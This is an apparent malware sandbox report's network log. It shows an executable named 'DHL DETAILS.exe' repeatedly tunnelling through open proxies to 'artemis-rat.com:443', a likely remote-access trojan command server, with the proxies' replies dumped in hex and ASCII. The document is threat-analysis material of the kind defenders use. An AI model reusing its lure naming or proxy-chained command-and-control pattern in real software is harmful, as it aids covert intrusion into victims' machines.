                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    854192.168.2.55273515.236.106.23631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.595660925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.893872976 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    855192.168.2.552053199.102.104.7041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.601526976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    856192.168.2.55275546.35.9.110806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.609843016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    857192.168.2.55275823.137.248.19788886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.611181974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    858192.168.2.55169751.15.234.222163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.613163948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.723901033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833606005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    859192.168.2.55272758.246.58.15090026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.615262985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.935012102 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    860192.168.2.55280198.162.25.29316796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.621504068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    861192.168.2.552639193.151.130.11480866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.623102903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    862192.168.2.552507111.206.0.9981816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.624898911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.634102106 CET162INHTTP/1.1 200 Connection Established
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: eJet/1.4.2
                                                                                    X-Nat-IP: 154.16.105.38


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    863192.168.2.55280472.206.181.105649356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.663006067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    864192.168.2.552635103.190.54.14180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.663264990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    865192.168.2.55260590.188.250.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.663343906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    866192.168.2.550232162.240.231.211621096352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.663460016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.723901987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833607912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.833117962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    867192.168.2.552739219.243.212.11884436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.663619995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.991122007 CET22INHTTP/1.1 502 ERROR


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    868192.168.2.55275313.229.47.109806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.664045095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.996867895 CET224INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:11:46 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Content-Length: 12
                                                                                    X-Kong-Response-Latency: -8.7738037109375e-05
                                                                                    Server: kong/2.8.1
                                                                                    Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                                    Data Ascii: Bad request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    869192.168.2.5527648.213.128.9077776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.664588928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.380332947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.472551107 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    870192.168.2.552450120.194.4.157826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.668607950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.320009947 CET319INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 170
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    871192.168.2.55023851.75.126.150356326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.669250965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    872192.168.2.552770185.81.153.16233896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.670523882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    873192.168.2.552780202.83.102.8380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.670576096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    874192.168.2.55173251.158.111.76163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.675033092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.723902941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833600044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    875192.168.2.552756203.171.19.98806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.679020882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536411047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.899497986 CET7INData Raw: 15 03 03 00 02 02 0a
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    876192.168.2.551802162.241.50.179340996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.680318117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.677071095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.736808062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    877192.168.2.552813121.164.200.1810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.680324078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536253929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    878192.168.2.55274765.1.244.23210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.707948923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.103594065 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    879192.168.2.552907104.16.106.234806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.716061115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.870562077 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    880192.168.2.5528623.12.144.14631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.718252897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.935096979 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    881192.168.2.55279947.96.145.1488886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.718519926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.075413942 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
